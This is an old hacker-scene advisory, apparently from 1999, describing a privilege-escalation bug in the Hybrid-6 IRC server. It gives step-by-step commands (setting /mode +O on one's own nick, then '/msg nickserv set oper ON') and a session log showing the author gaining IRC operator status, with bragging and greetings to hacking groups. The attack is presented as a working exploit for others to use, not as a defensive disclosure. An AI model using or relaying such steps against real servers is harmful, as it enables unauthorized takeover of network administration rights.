Version 2.8/Hybrid-6b96 Vulnerable ================================================== Bug found by dr_fdisk^ ------------------------------ This bug its really stupid to exploit and you can obtain IRCop level in vulnerable servers... How exploit this bug??? ----------------------- 1) First lo on to the server :-) 2) Identify your nick 3) Type this: /mode +O y0ur-nick 4) And now type this: /msg nickserv set oper ON 5) Now you can set the modes klmx,etc... Its easy no???????? -NickServ( This nickname is owned by someone else -NickServ( If this is your nickname, type /msg NickServ IDENTIFY -NickServ( If you do not IDENTIFY within one minute, you will be disconnected ymy Mode change [+iw] for user dr_fdisk^ [msg(nickserv)] identify mypassword -NickServ( Password accepted - you are now recognized /mode dr_fdisk^ +O ymy Mode change [+o] for user dr_fdisk^ [msg(nickserv)] set oper on -NickServ( Toggled Operator Status [ON] /mode dr_fdisk^ +kx ymy Mode change [+kx] for user dr_fdisk^ UDDDDD---D--DD-DDDDDD---D--DD-DDDDDDDDD--- -- - | dr_fdisk^ ( (Mexico) | ircname : * I'm to lame to read BitchX.doc * |Bug server : ([] CTCS, Inc - San Jose,CA,USA) | operator : dr_fdisk^ (is NOT an IRC warrior)------------------OPERATOR heheehehehe : idle : 0 hours 0 mins 30 secs (signon: Tue Aug 31 04:35:24 1999) [02:27am][dr_fdisk^(+ikwxO)] [] found by dr_fdisk^ Greetz to RaZa MeXiCaNa TeAm, Digital Rebel Net, fl3m team and others friends